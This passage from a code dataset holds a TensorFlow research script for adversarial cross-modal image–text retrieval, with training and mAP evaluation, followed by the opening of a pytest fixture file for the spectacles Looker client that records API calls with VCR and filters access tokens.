'adv_semantic_zsl_conditional_pascal_%d_%d_%d' % (self.visual_feat_dim, self.word_vec_dim, self.semantic_emb_dim)\n\n self.checkpoint_dir = 'checkpoint'\n self.sample_dir = 'samples'\n self.dataset_dir = './data'\n self.log_dir = 'logs'\n \n def update(self):\n self.checkpoint_dir = os.path.join(self.checkpoint_dir, self.model_dir)\n self.sample_dir = os.path.join(self.sample_dir, self.model_dir)\n self.log_dir = os.path.join(self.log_dir, self.model_dir)\n self.dataset_dir = os.path.join(self.dataset_dir, self.dataset_name)\n\n\nclass AdvCrossModalSimple(BaseModel):\n def __init__(self, model_params):\n BaseModel.__init__(self, model_params)\n self.data_iter = DataIter(self.model_params.batch_size)\n\n self.tar_img = tf.placeholder(tf.float32, [None, self.model_params.visual_feat_dim])\n self.tar_txt = tf.placeholder(tf.float32, [None, self.model_params.word_vec_dim])\n self.pos_img = tf.placeholder(tf.float32, [None, self.model_params.visual_feat_dim])\n self.neg_img = tf.placeholder(tf.float32, [None, self.model_params.visual_feat_dim])\n self.unpair_txt = tf.placeholder(tf.float32, [None, self.model_params.word_vec_dim])\n self.unpair_img = tf.placeholder(tf.float32, [None, self.model_params.visual_feat_dim])\n self.pos_txt = tf.placeholder(tf.float32, [None, self.model_params.word_vec_dim])\n self.neg_txt = tf.placeholder(tf.float32, [None, self.model_params.word_vec_dim])\n self.y = tf.placeholder(tf.int32, 
[self.model_params.batch_size,self.model_params.n_class])\n self.y_single = tf.placeholder(tf.int32, [self.model_params.batch_size,1])\n self.l = tf.placeholder(tf.float32, [])\n self.emb_v = self.visual_feature_embed(self.tar_img)\n self.emb_w = self.label_embed(self.tar_txt)\n self.emb_v_pos = self.visual_feature_embed(self.pos_img,reuse=True)\n self.emb_v_neg = self.visual_feature_embed(self.neg_img,reuse=True)\n self.emb_w_pos = self.label_embed(self.pos_txt,reuse=True)\n self.emb_w_neg = self.label_embed(self.neg_txt,reuse=True)\n self.emb_v_unpair = self.visual_feature_embed(self.unpair_img, reuse=True)\n self.emb_w_unpair = self.label_embed(self.unpair_txt, reuse=True)\n\n # triplet loss\n margin = self.model_params.margin\n alpha = self.model_params.alpha\n v_loss_pos = tf.reduce_sum(tf.nn.l2_loss(self.emb_v-self.emb_w_pos))\n v_loss_neg = tf.reduce_sum(tf.nn.l2_loss(self.emb_v-self.emb_w_neg))\n w_loss_pos = tf.reduce_sum(tf.nn.l2_loss(self.emb_w-self.emb_v_pos))\n w_loss_neg = tf.reduce_sum(tf.nn.l2_loss(self.emb_w-self.emb_v_neg))\n self.triplet_loss = tf.maximum(0.,margin+alpha*v_loss_pos-v_loss_neg) + tf.maximum(0.,margin+alpha*w_loss_pos-w_loss_neg)\n\n logits_v = self.label_classifier(self.emb_v)\n logits_w = self.label_classifier(self.emb_w, reuse=True)\n self.label_loss = tf.nn.softmax_cross_entropy_with_logits(labels=self.y, logits=logits_v) + \\\n tf.nn.softmax_cross_entropy_with_logits(labels=self.y, logits=logits_w)\n self.label_loss = tf.reduce_mean(self.label_loss)\n self.label_img_pred = tf.argmax(logits_v, 1)\n self.label_img_acc = tf.reduce_mean(tf.cast(tf.equal(self.label_img_pred, tf.argmax(self.y, 1)), tf.float32))\n self.label_shape_pred = tf.argmax(logits_w, 1)\n self.label_shape_acc = tf.reduce_mean(\n tf.cast(tf.equal(self.label_shape_pred, tf.argmax(self.y, 1)), tf.float32))\n self.label_class_acc = tf.divide(tf.add(self.label_img_acc, self.label_shape_acc), 2.0)\n self.emb_loss = 100*self.label_loss + self.triplet_loss\n # self.emb_v_class = self.domain_classifier(self.emb_v, self.l)\n # self.emb_w_class = self.domain_classifier(self.emb_w, self.l, reuse=True)\n\n all_emb_v = tf.concat([tf.ones([self.model_params.batch_size, 1]),\n tf.zeros([self.model_params.batch_size, 1])], 1)\n all_emb_w = tf.concat([tf.zeros([self.model_params.batch_size, 1]),\n tf.ones([self.model_params.batch_size, 1])], 1)\n # self.domain_class_loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.emb_v_class, labels=all_emb_w) + \\\n # tf.nn.softmax_cross_entropy_with_logits(logits=self.emb_w_class, labels=all_emb_v)\n # self.domain_class_loss = tf.reduce_mean(self.domain_class_loss)\n # self.domain_img_class_acc = tf.equal(tf.greater(0.5, self.emb_v_class), tf.greater(0.5, all_emb_w))\n # self.domain_shape_class_acc = tf.equal(tf.greater(self.emb_w_class, 0.5), tf.greater(all_emb_v, 0.5))\n # self.domain_class_acc = tf.reduce_mean(\n # tf.cast(tf.concat([self.domain_img_class_acc, self.domain_shape_class_acc], axis=0), tf.float32))\n\n # conditional D loss\n self.img_conditional_v_pred = self.img_conditional_classifier(self.tar_img, self.emb_v, self.l)\n self.img_conditional_w_pred = self.img_conditional_classifier(self.tar_img, self.emb_w, self.l, reuse=True)\n self.img_conditional_loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.img_conditional_v_pred, labels=all_emb_w) + \\\n tf.nn.softmax_cross_entropy_with_logits(logits=self.img_conditional_w_pred, labels=all_emb_v)\n self.img_conditional_loss = tf.reduce_mean(self.img_conditional_loss)\n 
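The bidirectional margin objective built above reduces, per direction, to max(0, margin + alpha*d(anchor, positive) - d(anchor, negative)), computed once with the image embedding as anchor and once with the text embedding as anchor. A tiny NumPy check of that arithmetic with made-up embeddings (l2 mirrors tf.nn.l2_loss, i.e. sum of squared differences over 2; margin and alpha match the ModelParams defaults):

import numpy as np

def l2(a, b):
    return np.sum((a - b) ** 2) / 2.0  # tf.nn.l2_loss semantics

margin, alpha = 0.1, 5
emb_v = np.array([0.1, 0.2])       # image embedding (anchor)
emb_w_pos = np.array([0.1, 0.25])  # paired text: close
emb_w_neg = np.array([0.9, -0.4])  # hardest unpaired text: far

v_loss = max(0.0, margin + alpha * l2(emb_v, emb_w_pos) - l2(emb_v, emb_w_neg))
print(v_loss)  # 0.0 here: the negative is far enough away that no loss accrues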
self.img_conditional_acc = tf.divide(tf.add(self.acc_op(self.img_conditional_v_pred, all_emb_w), self.acc_op(self.img_conditional_w_pred, all_emb_v)), 2.0)\n\n self.label_conditional_v_pred = self.label_conditional_classifier(self.tar_txt, self.emb_v, self.l)\n self.label_conditional_w_pred = self.label_conditional_classifier(self.tar_txt, self.emb_w, self.l, reuse=True)\n self.label_conditional_loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.label_conditional_v_pred, labels=all_emb_w) + \\\n tf.nn.softmax_cross_entropy_with_logits(logits=self.label_conditional_w_pred, labels=all_emb_v)\n self.label_conditional_loss = tf.reduce_mean(self.label_conditional_loss)\n self.label_conditional_acc = tf.divide(tf.add(self.acc_op(self.label_conditional_v_pred, all_emb_w), self.acc_op(self.label_conditional_w_pred, all_emb_v)), 2.0)\n\n\n # Pair D loss\n # self.emb_pair_pred = self.pair_classifier(self.emb_v, self.emb_w, self.l)\n # self.emb_unpair_pred = self.pair_classifier(tf.concat([self.emb_v, self.emb_w_unpair], axis=0), tf.concat([self.emb_v_unpair, self.emb_w], axis=0), self.l, reuse=True)\n # pair_labels, unpair_labels = tf.ones([self.model_params.batch_size, 1]), tf.zeros([self.model_params.batch_size*2, 1])\n # self.pair_loss = tf.concat([tf.nn.sigmoid_cross_entropy_with_logits(logits=self.emb_pair_pred, labels=pair_labels), \\\n # tf.nn.sigmoid_cross_entropy_with_logits(logits=self.emb_unpair_pred, labels=unpair_labels)], axis=0)\n # self.pair_loss = tf.reduce_mean(self.pair_loss)\n # self.pair_acc = tf.equal(tf.greater(pair_labels, 0.5), tf.greater(self.emb_pair_pred, 0.5))\n # self.unpair_acc = tf.equal(tf.greater(0.5, unpair_labels), tf.greater(0.5, self.emb_unpair_pred))\n # self.pair_all_acc = tf.reduce_mean(tf.cast(tf.concat([self.pair_acc, self.unpair_acc], axis=0), tf.float32))\n # self.pair_acc = tf.reduce_mean(tf.cast(self.pair_acc, tf.float32))\n # self.unpair_acc = tf.reduce_mean(tf.cast(self.unpair_acc, tf.float32))\n\n # TODO G loss as paper\n # maximize domain class loss and minimize pair loss\n self.G_loss = self.emb_loss - self.model_params.r_domain * (self.img_conditional_loss + self.label_conditional_loss) # + self.model_params.r_pair * self.pair_loss\n\n self.t_vars = tf.trainable_variables()\n self.vf_vars = [v for v in self.t_vars if 'vf_' in v.name]\n self.le_vars = [v for v in self.t_vars if 'le_' in v.name]\n self.dc_vars = [v for v in self.t_vars if 'dc_' in v.name]\n self.icc_vars = [v for v in self.t_vars if 'icc_' in v.name] # image conditional D\n self.lcc_vars = [v for v in self.t_vars if 'lcc_' in v.name] # label conditional D\n self.lc_vars = [v for v in self.t_vars if 'lc_' in v.name]\n self.pc_vars = [v for v in self.t_vars if 'pc_' in v.name] # pair\n\n def acc_op(self, pred, label, threshold=0.5):\n return tf.reduce_mean(tf.cast(tf.equal(tf.greater(pred, threshold), tf.greater(label, threshold)), tf.float32))\n\n def visual_feature_embed(self, X, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n net = tf.nn.tanh(slim.fully_connected(X, 2000, scope='vf_fc_0'))\n # net = tf.nn.tanh(slim.fully_connected(net, 200, scope='vf_fc_1'))\n net = tf.nn.tanh(slim.fully_connected(net, self.model_params.semantic_emb_dim, scope='vf_fc_2'))\n return net\n\n def label_embed(self, L, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n net = tf.nn.tanh(slim.fully_connected(L, 500, scope='le_fc_0'))\n # net = 
tf.nn.tanh(slim.fully_connected(net, 100, scope='le_fc_1'))\n net = tf.nn.tanh(slim.fully_connected(net, self.model_params.semantic_emb_dim, scope='le_fc_2'))\n return net \n def label_classifier(self, X, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n net = slim.fully_connected(X, self.model_params.n_class, scope='lc_fc_0')\n return net \n def domain_classifier(self, E, l, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n E = flip_gradient(E, l)\n net = slim.fully_connected(E, self.model_params.semantic_emb_dim/2, scope='dc_fc_0')\n net = slim.fully_connected(net, self.model_params.semantic_emb_dim/4, scope='dc_fc_1')\n net = slim.fully_connected(net, 2, scope='dc_fc_2')\n return net\n\n def pair_classifier(self, V, W, l, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n V, W = flip_gradient(V, l), flip_gradient(W, l)\n net = slim.fully_connected(tf.concat([V, W], axis=1), self.model_params.semantic_emb_dim / 2, scope='pc_fc_0')\n net = slim.fully_connected(net, self.model_params.semantic_emb_dim/4, scope='pc_fc_1')\n net = slim.fully_connected(net, 1, scope='pc_fc_2')\n return net\n def label_conditional_classifier(self, ori_W, E, l, is_training=True, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n E = flip_gradient(E, l)\n net = slim.fully_connected(tf.concat([E, ori_W], axis=1), 512, scope='lcc_fc_0')\n net = slim.fully_connected(net, 100, scope='lcc_fc_1')\n net = slim.fully_connected(net, 2, scope='lcc_fc_2')\n return net\n\n def img_conditional_classifier(self, ori_V, E, l, is_training=False, reuse=False):\n with slim.arg_scope([slim.fully_connected], activation_fn=None, reuse=reuse):\n E = flip_gradient(E, l)\n net = slim.fully_connected(tf.concat([E, ori_V], axis=1), 512, scope='icc_fc_0')\n net = slim.fully_connected(net, 100, scope='icc_fc_1')\n net = slim.fully_connected(net, 2, scope='icc_fc_2')\n return net\n\n def find_neg_pair(self, fcs1, fcs2):\n \"\"\"\n find negative pair for each value of fcs1 from fcs2\n :param fcs1:\n :param fcs2:\n :return:\n \"\"\"\n fcs1_np, fcs2_np = np.array(fcs1), np.array(fcs2)\n assert fcs1_np.shape[0] == fcs2_np.shape[0]\n size = fcs1_np.shape[0]\n sims = cosine_similarity(fcs1_np, fcs1_np)\n result = []\n for i in range(size):\n sims[i][i] = -1.0\n neg_index = np.argmax(sims[i, :], axis=0).astype(int)\n result.append(neg_index)\n return fcs2_np[result]\n\n def train(self, sess):\n #self.check_dirs()\n \n # total_loss = self.emb_loss + self.domain_class_loss\n # total_train_op = tf.train.AdamOptimizer(\n # learning_rate=self.model_params.lr_total,\n # beta1=0.5).minimize(total_loss)\n emb_train_op = tf.train.AdamOptimizer(\n learning_rate=self.model_params.lr_emb,\n beta1=0.5).minimize(self.G_loss, var_list=self.le_vars+self.vf_vars)\n img_conditionalD_train_op = tf.train.AdamOptimizer(\n learning_rate=self.model_params.lr_domain,\n beta1=0.5).minimize(self.img_conditional_loss, var_list=self.icc_vars)\n label_conditionalD_train_op = tf.train.AdamOptimizer(\n learning_rate=self.model_params.lr_domain,\n beta1=0.5).minimize(self.label_conditional_loss, var_list=self.lcc_vars)\n # pair_train_op = tf.train.AdamOptimizer(\n # learning_rate=self.model_params.lr_pair,\n # beta1=0.5).minimize(self.pair_loss, var_list=self.pc_vars)\n\n tf.global_variables_initializer().run()\n self.saver = tf.train.Saver()\n\n start_time = 
time.time()\n map_avg_ti = []\n map_avg_it = []\n adv_loss = []\n emb_loss = []\n for epoch in range(self.model_params.epoch):\n p = float(epoch) / self.model_params.epoch\n l = 2. / (1. + np.exp(-10. * p)) - 1\n for batch_feat, batch_vec, batch_labels, idx in self.data_iter.train_data():\n # create one-hot labels\n batch_labels_ = batch_labels - np.ones_like(batch_labels)\n label_binarizer = sklearn.preprocessing.LabelBinarizer()\n label_binarizer.fit(range(self.model_params.n_class))\n b = label_binarizer.transform(batch_labels_)\n adj_mat = np.dot(b,np.transpose(b))\n mask_mat = np.ones_like(adj_mat) - adj_mat\n img_sim_mat = mask_mat*cosine_similarity(batch_feat,batch_feat)\n txt_sim_mat = mask_mat*cosine_similarity(batch_vec,batch_vec)\n img_neg_txt_idx = np.argmax(img_sim_mat,axis=1).astype(int)\n txt_neg_img_idx = np.argmax(txt_sim_mat,axis=1).astype(int)\n #print('{0}'.format(img_neg_txt_idx.shape)\n batch_vec_ = np.array(batch_vec)\n batch_feat_ = np.array(batch_feat) \n img_neg_txt = batch_vec_[img_neg_txt_idx,:]\n txt_neg_img = batch_feat_[txt_neg_img_idx,:]\n img_unpair_txt = self.find_neg_pair(batch_feat, batch_vec)\n txt_unpair_img = self.find_neg_pair(batch_vec, batch_feat)\n #_, label_loss_val, dissimilar_loss_val, similar_loss_val = sess.run([total_train_op, self.label_loss, self.dissimilar_loss, self.similar_loss], feed_dict={self.tar_img: batch_feat, self.tar_txt: batch_vec, self.y: b, self.y_single: np.transpose([batch_labels]),self.l: l})\n # TODO no domain classifier\n # sess.run([emb_train_op, domain_train_op],\n sess.run([emb_train_op],\n feed_dict={self.tar_img: batch_feat,\n self.tar_txt: batch_vec,\n self.pos_txt: batch_vec,\n self.neg_txt: img_neg_txt,\n self.pos_img: batch_feat,\n self.neg_img: txt_neg_img,\n self.unpair_img: txt_unpair_img,\n self.unpair_txt: img_unpair_txt,\n self.y: b,\n self.y_single: np.transpose([batch_labels]),\n self.l: l})\n sess.run([img_conditionalD_train_op],\n feed_dict={self.tar_img: batch_feat,\n self.tar_txt: batch_vec,\n self.pos_txt: batch_vec,\n self.neg_txt: img_neg_txt,\n self.pos_img: batch_feat,\n self.neg_img: txt_neg_img,\n self.unpair_img: txt_unpair_img,\n self.unpair_txt: img_unpair_txt,\n self.y: b,\n self.y_single: np.transpose([batch_labels]),\n self.l: l})\n sess.run([label_conditionalD_train_op],\n feed_dict={self.tar_img: batch_feat,\n self.tar_txt: batch_vec,\n self.pos_txt: batch_vec,\n self.neg_txt: img_neg_txt,\n self.pos_img: batch_feat,\n self.neg_img: txt_neg_img,\n self.unpair_img: txt_unpair_img,\n self.unpair_txt: img_unpair_txt,\n self.y: b,\n self.y_single: np.transpose([batch_labels]),\n self.l: l})\n label_loss_val, triplet_loss_val, emb_loss_val, img_conditional_loss_val, label_conditional_loss_val, g_loss_val, label_acc_val, img_conditional_acc_val, label_conditional_acc_val = \\\n sess.run([self.label_loss, self.triplet_loss, self.emb_loss, self.img_conditional_loss, self.label_conditional_loss, self.G_loss, self.label_class_acc, self.img_conditional_acc, self.label_conditional_acc],\n feed_dict={self.tar_img: batch_feat,\n self.tar_txt: batch_vec,\n self.pos_txt: batch_vec,\n self.neg_txt: img_neg_txt,\n self.pos_img: batch_feat,\n self.neg_img: txt_neg_img,\n self.unpair_img: txt_unpair_img,\n self.unpair_txt: img_unpair_txt,\n self.y: b,\n self.y_single: np.transpose([batch_labels]),\n self.l: l})\n print('Epoch: [%2d][%4d/%4d] time: %4.4f, emb_loss: %.8f, img_conditional_loss: %.8f, label_conditional_loss: %.8f, label_loss: %.8f, triplet_loss: %.8f, g_loss: %.8f, label_acc:%.8f, 
img_conditional_acc:%.8f, label_conditional_acc:%.8f' %(\n epoch, idx, self.data_iter.num_train_batch, time.time() - start_time, emb_loss_val, img_conditional_loss_val, label_conditional_loss_val, label_loss_val, triplet_loss_val, g_loss_val, label_acc_val, img_conditional_acc_val, label_conditional_acc_val\n ))\n if (epoch+1) % self.model_params.n_save_epoch == 0:\n self.save(epoch+1, sess)\n # if epoch == (self.model_params.epoch - 1):\n # self.emb_v_eval, self.emb_w_eval = sess.run([self.emb_v, self.emb_w],\n # feed_dict={\n # self.tar_img: batch_feat,\n # self.tar_txt: batch_vec,\n # self.y: b,\n # self.y_single: np.transpose([batch_labels]),\n # self.l: l})\n # with open('./data/wikipedia_dataset/train_img_emb.pkl', 'wb') as f:\n # cPickle.dump(self.emb_v_eval, f, cPickle.HIGHEST_PROTOCOL)\n # with open('./data/wikipedia_dataset/train_txt_emb.pkl', 'wb') as f:\n # cPickle.dump(self.emb_w_eval, f, cPickle.HIGHEST_PROTOCOL)\n self.save(epoch, sess)\n def eval_random_rank(self):\n start = time.time()\n #with open('./data/wikipedia_dataset/test_labels.pkl', 'rb') as fpkl:\n # test_labels = cPickle.load(fpkl)\n with open('./data/wiki_shallow/L_te.pkl', 'rb') as fpkl:\n test_labels = cPickle.load(fpkl)\n k = self.model_params.top_k\n avg_precs = []\n for i in range(len(test_labels)):\n query_label = test_labels[i]\n\n # distances and sort by distances\n sorted_idx = range(len(test_labels))\n shuffle(sorted_idx)\n\n # for each k do top-k\n precs = []\n for topk in range(1, k + 1):\n hits = 0\n top_k = sorted_idx[0 : topk]\n if query_label != test_labels[top_k[-1]]:\n continue\n for ii in top_k:\n retrieved_label = test_labels[ii]\n if query_label != retrieved_label:\n hits += 1\n precs.append(float(hits) / float(topk))\n avg_precs.append(np.sum(precs) / float(k))\n mean_avg_prec = np.mean(avg_precs)\n print('[Eval - random] mAP: %f in %4.4fs' % (mean_avg_prec, (time.time() - start)))\n \n\n def eval(self, sess):\n start = time.time()\n self.saver = tf.train.Saver()\n self.load(sess)\n\n test_img_feats_trans = []\n test_txt_vecs_trans = []\n test_labels = []\n test_img_feats, test_txt_feats = np.array([]), np.array([])\n for feats, vecs, labels, i in self.data_iter.test_data():\n test_img_feats = np.concatenate([test_img_feats, feats], axis=0) if test_img_feats.shape[0] > 0 else np.array(feats)\n test_txt_feats = np.concatenate([test_txt_feats, vecs], axis=0) if test_txt_feats.shape[0] > 0 else np.array(vecs)\n feats_trans = sess.run(self.emb_v, feed_dict={self.tar_img: feats})\n vecs_trans = sess.run(self.emb_w, feed_dict={self.tar_txt: vecs})\n test_labels += labels\n for ii in range(len(feats)):\n test_img_feats_trans.append(feats_trans[ii])\n test_txt_vecs_trans.append(vecs_trans[ii])\n print(len(test_img_feats_trans))\n # img_txt_D = []\n # for feats in test_img_feats:\n # pair_sim = sess.run(self.emb_pair_pred, feed_dict={self.tar_img: np.tile(feats, (test_txt_feats.shape[0], 1)), self.tar_txt: test_txt_feats})\n # img_txt_D.append(pair_sim.tolist())\n # img_txt_D = np.reshape(img_txt_D, [len(img_txt_D), len(img_txt_D[0])])\n # pair_labels = np.zeros(img_txt_D.shape)\n # for i in range(pair_labels.shape[0]):\n # pair_labels[i][i] = 1.0\n # test_pair_acc = np.mean(np.equal(pair_labels > 0.5, img_txt_D > 0.5).astype(float))\n # print(\"eval pair acc:\", test_pair_acc)\n # dim2dis_func = np.vectorize(lambda s: 1.0 - s)\n # img_txt_D = dim2dis_func(img_txt_D)\n # np.save('img_txt_D_train', img_txt_D)\n # print(\"img2shape pair:\", img2shape(img_txt_D,\n # np.arange(0, 
test_img_feats.shape[0]), top_k=self.model_params.top_k,\n # tag=\"acmr-triplet-img2shape\", save_dir='./result'))\n # print(\"txt2img pair:\", img2shape(np.transpose(img_txt_D),\n # np.arange(0, test_txt_feats.shape[0]), top_k=self.model_params.top_k,\n # tag=\"acmr-triplet-txt2img\", save_dir='./result'))\n\n test_img_feats_trans = np.asarray(test_img_feats_trans)\n test_txt_vecs_trans = np.asarray(test_txt_vecs_trans)\n test_feats_trans = np.concatenate((test_img_feats_trans[0:1000], test_txt_vecs_trans[-1000:]))\n np.save('./result/feature/test_joint_img_feat', test_img_feats_trans)\n np.save('./result/feature/test_joint_txt_feat', test_txt_vecs_trans)\n np.save('./result/feature/test_labels', np.asarray(test_labels))\n #with open('./data/wikipedia_dataset/test_feats_transformed.pkl', 'wb') as f:\n # cPickle.dump(test_feats_trans, f, cPickle.HIGHEST_PROTOCOL) \n with open('./data/wiki_shallow/test_feats_transformed.pkl', 'wb') as f:\n cPickle.dump(test_feats_trans, f, cPickle.HIGHEST_PROTOCOL) \n print('[Eval] transformed test features in %4.4f' % (time.time() - start))\n top_k = self.model_params.top_k\n avg_precs = []\n all_precs = []\n for k in range(1, top_k+1):\n for i in range(len(test_txt_vecs_trans)):\n query_label = test_labels[i]\n\n # distances and sort by distances\n wv = test_txt_vecs_trans[i]\n diffs = test_img_feats_trans - wv\n dists = np.linalg.norm(diffs, axis=1)\n sorted_idx = np.argsort(dists)\n\n #for each k do top-k\n precs = []\n for topk in range(1, k + 1):\n hits = 0\n top_k = sorted_idx[0 : topk]\n if np.sum(query_label) != test_labels[top_k[-1]]:\n continue\n for ii in top_k:\n retrieved_label = test_labels[ii]\n if np.sum(retrieved_label) == query_label:\n hits += 1\n precs.append(float(hits) / float(topk))\n if len(precs) == 0:\n precs.append(0)\n avg_precs.append(np.average(precs))\n mean_avg_prec = np.mean(avg_precs)\n all_precs.append(mean_avg_prec)\n print('[Eval - txt2img] mAP: %f in %4.4fs' % (all_precs[0], (time.time() - start)))\n print(all_precs)\n t2i = all_precs[0]\n #with open('./data/wikipedia_dataset/txt2img_all_precision.pkl', 'wb') as f:\n # cPickle.dump(all_precs, f, cPickle.HIGHEST_PROTOCOL) \n with open('./data/wiki_shallow/txt2img_all_precision.pkl', 'wb') as f:\n cPickle.dump(all_precs, f, cPickle.HIGHEST_PROTOCOL) \n\n avg_precs = []\n all_precs = []\n\n for k in range(1, self.model_params.top_k+1):\n for i in range(len(test_img_feats_trans)):\n query_img_feat = test_img_feats_trans[i]\n ground_truth_label = test_labels[i]\n\n # calculate distance and sort\n diffs = test_txt_vecs_trans - query_img_feat\n dists = np.linalg.norm(diffs, axis=1)\n sorted_idx = np.argsort(dists)\n\n # for each k in top-k\n precs = []\n for topk in range(1, k + 1):\n hits = 0\n top_k = sorted_idx[0 : topk]\n if np.sum(ground_truth_label) != test_labels[top_k[-1]]:\n continue\n for ii in top_k:\n retrieved_label = test_labels[ii]\n if np.sum(ground_truth_label) == retrieved_label:\n hits += 1\n precs.append(float(hits) / float(topk))\n if len(precs) == 0:\n precs.append(0)\n avg_precs.append(np.average(precs))\n mean_avg_prec = np.mean(avg_precs)\n all_precs.append(mean_avg_prec) \n print('[Eval - img2txt] mAP: %f in %4.4fs' % (all_precs[0], (time.time() - start)))\n print(all_precs)\n \n \n #with open('./data/wikipedia_dataset/text_words_map.pkl', 'wb') as f:\n # cPickle.dump(all_precs, f, cPickle.HIGHEST_PROTOCOL)\n with open('./data/wiki_shallow/text_words_map.pkl', 'wb') as f:\n cPickle.dump(all_precs, f, cPickle.HIGHEST_PROTOCOL) \n #Text query \n\n
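Both evaluation loops above follow the same retrieval recipe: rank the gallery by L2 distance to the query embedding, then average precision over top-k prefixes. A compact NumPy sketch of the standard average-precision variant of that idea for one query (toy embeddings and labels, purely illustrative):

import numpy as np

query = np.array([0.0, 0.0])
gallery = np.array([[0.1, 0.0], [2.0, 2.0], [0.0, 0.2], [3.0, 0.0]])
labels = np.array([1, 2, 1, 2])  # gallery class labels
query_label = 1

order = np.argsort(np.linalg.norm(gallery - query, axis=1))  # nearest first
hits, precs = 0, []
for rank, idx in enumerate(order, start=1):
    if labels[idx] == query_label:
        hits += 1
        precs.append(hits / rank)  # precision at each relevant rank
print(np.mean(precs))  # 1.0 here: both same-class items are ranked first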
#with open('./data/wikipedia_dataset/text_words_map.pkl', 'rb') as f:\n # txt_words = cPickle.load(f)\n #with open('./data/wikipedia_dataset/test_img_words.pkl', 'rb') as f:\n # img_words = cPickle.load(f)\n #with open('./data/wikipedia_dataset/test_txt_files.pkl', 'rb') as f:\n # test_txt_names = cPickle.load(f)\n #with open('./data/wikipedia_dataset/test_img_files.pkl', 'rb') as f:\n # test_img_names = cPickle.load(f) \n with open('./data/wikipedia_dataset/text_words_map.pkl', 'rb') as f:\n txt_words = cPickle.load(f)\n with open('./data/wikipedia_dataset/test_img_words.pkl', 'rb') as f:\n img_words = cPickle.load(f)\n with open('./data/wikipedia_dataset/test_txt_files.pkl', 'rb') as f:\n test_txt_names = cPickle.load(f)\n with open('./data/wikipedia_dataset/test_img_files.pkl', 'rb') as f:\n test_img_names = cPickle.load(f)\n\n print(test_img_feats_trans.shape[0])\n img2shape_pair_acc = img2shape(cdist(test_img_feats_trans, test_txt_vecs_trans),\n np.arange(0, test_img_feats_trans.shape[0]), top_k=self.model_params.top_k,\n tag=\"acmr-triplet-img2shape\", save_dir='./result')\n shape2img_pair_acc = img2shape(cdist(test_txt_vecs_trans, test_img_feats_trans), np.arange(0, test_img_feats_trans.shape[0]), top_k=self.model_params.top_k,\n tag=\"acmr-triplet-txt2img\", save_dir='./result')\n print('[Test - img2shape pair(Edu):]', img2shape_pair_acc)\n print('[Test - txt2img pair(Edu):]', shape2img_pair_acc)\n print('[Eval] finished precision-scope in %4.4fs' % (time.time() - start))\n\ndef dis_img_shape(img_fcs, shape_fcs):\n return cdist(img_fcs, shape_fcs)\ndef dis_shape_img(shape_fcs, img_fcs):\n return cdist(shape_fcs, img_fcs)\n\ndef img2shape(D, pair_img_model, top_k=50, tag=\"all\", save_dir=\"\"):\n # D = cdist(img_fcs, shape_fcs)\n image_N = D.shape[0]\n image2shape_retrieval_ranking = []\n for k in range(image_N):\n distances = D[k, :] # [float(distance) for distance in line.strip().split()]\n ranking = range(len(distances))\n ranking.sort(key=lambda rank: distances[rank])\n # print 'image %d \\t retrieval: %d' % (k, ranking.index(pair_img_model[k]) + 1)\n image2shape_retrieval_ranking.append(ranking.index(pair_img_model[k]) + 1)\n image2shape_topK_accuracies = []\n for topK in range(top_k):\n n = sum([r <= topK + 1 for r in image2shape_retrieval_ranking])\n image2shape_topK_accuracies.append(n / float(image_N))\n if save_dir and len(save_dir) > 0:\n np.savetxt(os.path.join(save_dir, 'image2txt_top%d_accuracy_%s.txt'%(top_k, tag)), image2shape_topK_accuracies, fmt='%.4f')\n return image2shape_topK_accuracies","sub_path":"models/adv_crossmodal_triplet_conditionalD_pascal.py","file_name":"adv_crossmodal_triplet_conditionalD_pascal.py","file_ext":"py","file_size_in_byte":33670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514237741","text":"from typing import Iterable\nimport os\nimport vcr\nimport json\nfrom github import Github as GitHub, Repository\nimport pytest\nfrom spectacles.client import LookerClient\nfrom spectacles.exceptions import SqlError\nfrom spectacles.lookml import Project, Model, Explore, Dimension\nfrom utils import load_resource\n\n\ndef filter_access_token(response):\n if \"access_token\" in response[\"body\"][\"string\"].decode():\n body = json.loads(response[\"body\"][\"string\"])\n del body[\"access_token\"]\n response[\"body\"][\"string\"] = json.dumps(body)\n return response\n\n\n@pytest.fixture(scope=\"session\")\ndef vcr_config():\n return {\"filter_headers\": 
[\"Authorization\"]}\n\n\n@pytest.fixture(scope=\"session\")\ndef looker_client() -> Iterable[LookerClient]:\n with vcr.use_cassette(\n \"tests/cassettes/init_client.yaml\",\n filter_post_data_parameters=[\"client_id\", \"client_secret\"],\n filter_headers=[\"Authorization\"],\n record_mode=\"all\",\n before_record_response=filter_access_token,\n decode_compressed_response=True,\n ):\n client = LookerClient(\n base_url=\"https://spectacles.looker.com\",\n client_id=os.environ.get(\"LOOKER_CLIENT_ID\", \"\"),\n client_secret=os.environ.get(\"LOOKER_CLIENT_SECRET\", \"\"),\n )\n client.update_workspace(\"production\")\n yield client\n\n\n@pytest.fixture(scope=\"session\")\ndef remote_repo() -> Repository:\n access_token = os.environ.get(\"GITHUB_ACCESS_TOKEN\")\n client = GitHub(access_token)\n with vcr.use_cassette(\n \"tests/cassettes/init_github.yaml\",\n filter_headers=[\"Authorization\"],\n decode_compressed_response=True,\n ):\n repo = client.get_repo(\"spectacles-ci/eye-exam\")\n return repo\n\n\n@pytest.fixture\ndef dimension():\n return Dimension(\n name=\"age\",\n model_name=\"eye_exam\",\n explore_name=\"users\",\n type=\"number\",\n tags=[],\n sql='${TABLE}.\"AGE\"',\n url=\"/projects/eye_exam/files/views%2Fusers.view.lkml?line=6\",\n )\n\n\n@pytest.fixture\ndef explore():\n return Explore(name=\"users\", model_name=\"eye_exam\")\n\n\n@pytest.fixture\ndef model():\n return Model(name=\"eye_exam\", project_name=\"eye_exam\", explores=[])\n\n\n@pytest.fixture\ndef project():\n return Project(name=\"eye_exam\", models=[])\n\n\n@pytest.fixture\ndef sql_error():\n return SqlError(\n dimension=\"users.age\",\n 